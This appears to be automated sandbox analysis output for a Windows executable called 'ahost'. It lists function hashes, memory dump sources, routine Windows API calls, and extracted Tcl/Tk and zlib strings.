                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction ID: 8e14470d234dd54ed00dc2bd32ee21cadaa43b285cb6f706435381aa38cd5bae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F11E261A18A4581EB20AF25BC14169A371AB41BF8FA40331EE7E4B7ECDF3CD0118780
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction ID: d87bd7ae32fddcae56845bd813a3300c51b8365cbdb2dea8c668fe8c27b6d6f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BE04F10F0920642FF547FB26C8517891716F84B44F844134CA3D862EAFE2C689583B0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 2a21e30385b3368fc9d2ce6c3d3da71baf87aa466c829b30c2c42fa73aca0d4c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8521B321F1C64641FBD4AF21BC9027992A65F847A8F984334DB3E473D9FE6CA4404390
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction ID: f54cd4fd4dadf9e2d986613561f72392da95f41ba0df84fe0a753b136376ff2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4141A232D0820987FB74AF15F940279B3B4EB55B48F940131D7BD866D9EB2DE4028AA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
                                                                                                                                                                                                                              • Instruction ID: 03bbbc4c37ab351b520f6a4c5d1163f782ac27e06166d5ca2fd98c891b0e493a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F221BB21F1865286FB58BE2279043BAD661BF45BD8FCC0070EE6C077CADE3DE44186A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction ID: ba4f1c134a783ccdc4b500deed89fb48745e438841059c75e2539ea0e805a081
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE317C31E2864A85F761BF55AC4127CAA70AB80B98FC10135EB3D473DAEF7CA45187B0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                              • Instruction ID: 0e6062f7fdf114268bbb36e2bfa347b911cd0c1942f441372feaa4eca54c484b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72216D36E0468ACAEB64AF68D8442AC73B4EB4471CF844635D73D06ADDEF38D544C7A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 180e1abbd3a409681df0892ecc8f6042999b75a6e9021efee80724af34e77979
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60114F22E1864942FB60BF11B80017DE674AF85B88F8540B1EB7D57ADAEF3ED40087A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction ID: 676c7c1d506c1664077f5287841121bc6a905ceb5ea9742d912aa7df9a95cef2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2219572E1864586EBA1AF18E840379B6B0FB84B54F944334E6AD876EDDF3CD4048B50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: c7da64207e5e993d3a647450791a941979b7ebdfa649c29cd98b28bcb0fc40bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D018E22E0874941EB05EF52AD01079E6A1BF85FE8B884631EF7C57BDAEE3CE1018750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF7F91F0D00,?,?,?,00007FF7F91F236A,?,?,?,?,?,00007FF7F91F3B59), ref: 00007FF7F91FD6AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction ID: 4ca5cd52a44ddc0ed6aa6d754ea44280300fe51a4618d9d5b00d4a7fd9cba1d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50F03A04E09A0E44FF647F616C412B992B04F94BB8FC802309E3E852EAEE2CA44482F0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction ID: 13820e88d307691d267fa4ba2213d3887509f0c0e674407d05860e71928d0396
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09026D24E0AB0791FBA5BF55BC145B8A2B1AF08754FC45435D83E826ECEF3CB55C82A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                              • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                              • Instruction ID: 5acb07627ae316a0b5817bfff5e6ee92e3357cdee5580afa161594624903ac65
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75B2C872E182824BF7A49E65D8407FDB7B1FB94344F905135DA2D97ADCEB38A9008B90
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                              • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                              • Instruction ID: d444e9a0de4587bbcf9c1785001404934bd00e0fe64c226da1df109ed9d18fbf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23521772E146A68BE7A4AF15E858B7D7BB9FB44300F414139E65A837C4DB3CE840CB91
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction ID: 18a1dde9d9c542ff972fd2a0f1a51436f90a237a079196a8dc08a7e2c64853f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30312176A08B858AEB60AF60EC403EE7374FB84744F844439DA5E47BA8DF38D548C760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7F9205CB5
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F9205608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920561C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8
